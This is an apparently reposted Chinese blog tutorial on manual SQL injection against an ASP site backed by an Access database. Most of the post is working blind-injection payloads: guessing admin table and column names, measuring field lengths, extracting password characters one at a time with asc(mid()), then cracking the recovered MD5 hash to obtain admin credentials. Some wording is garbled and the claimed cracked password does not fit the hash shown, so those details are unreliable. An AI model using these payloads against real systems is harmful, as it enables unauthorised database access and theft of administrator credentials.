博客
关于我
SQL注入access数据库
阅读量:664 次
发布时间:2019-03-16

本文共 914 字,大约阅读时间需要 3 分钟。

SQL注入是一种敏感的安全漏洞,通常通过未正确处理或过渡;++_operator来导致,允许攻击者执行恶意SQL命令。以下是一些手动操作SQL注入的步骤和技巧。

1. 检查注入可能性

首先,观察URL参数是否能够直接注入数据库。例如:

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139

若返回正常响应(如1=1),则表明路径存在注入漏洞。

2. 猜测数据库表名

使用以下SQL语句猜测数据库表名:

and exists (select * from 表名)

替换表名为常见的管理员表名,如admina_adminx_admin等。

  • 如果存在该表名,页面返回正常,说明表名正确。
  • 如果返回错误,继续调整表名或尝试其他名称。

3. 猜测字段名称

逐步猜测字段名称,例如:

and exists (select 字段名 from 表名)

替换字段名为常见管理员字段,如adminpassword等。

  • 确认字段存在后,继续下一步骤。

4. 判断字段长度

测量字段长度,例如:

and (select top 1 len(字段) from 表名) > 0
  • 测试用户名字段长度:and (select top 1 len(admin) from admin) > 0
  • 测试密码字段长度:and (select top 1 len(password) from admin) > 0

这有助于确定字段的具体长度。

5. 分析ASCII码

逐一分析字符的ASCII码:

  • 使用以下SQL语句获取字符ASCII码值:
and (select top 1 asc(mid(字段, 1, 1)) from 表名) > 0
  • 逐步确定每个字符的ASCII码值。
  • 示例:用户_id为admin,密码逐步分析为a48e190fafc257d3

6. 密码解密

将获取到的密码哈希值解密。例如:

bendss

使用在线MD5解密工具仔细核对解密结果。

7. 总结

通过以上步骤,从SQL注入点逐步挖掘数据库结构,获取管理员账号和密码。记住,测试环境至关重要,避免对生产环境造成损害。

转载地址:http://vmnqz.baihongyu.com/

你可能感兴趣的文章
Little Zu Chongzhi's Triangles
查看>>
Train Problem II(卡特兰数+大数乘除)
查看>>
一些技术博客
查看>>
第01问:MySQL 一次 insert 刷几次盘?
查看>>
libvirtd:内部错误:Failed to apply firewall rule
查看>>
优先级队列2
查看>>
TiKV 源码解析系列文章(十三)MVCC 数据读取
查看>>
1900分图论 : 1183E1 LCA + Kruskal
查看>>
(建议收藏)计算机网络:传输层概述、UDP协议与可靠传输协议习题解析与拓展
查看>>
Android 开发常用的工具类(更新ing)
查看>>
EasyUI的简单介绍
查看>>
HTTP 错误 500.21 - Internal Server Error 发布网站遇到这个错误
查看>>
初次安装webpack之后,提示安装webpack-cli
查看>>
使用FileZilla,FTP登录出现错误:FileZilla状态: 不安全的服务器,不支持 FTP over TLS
查看>>
Hbase压力测试
查看>>
StreamReader & StreamWriter
查看>>
C#中的类、方法和属性
查看>>
Python爬虫训练:爬取酷燃网视频数据
查看>>
Python数据分析入门(十九):绘制散点图
查看>>
C++版浙大PAT乙级1069(20分)测试点3答案错误解决方法
查看>>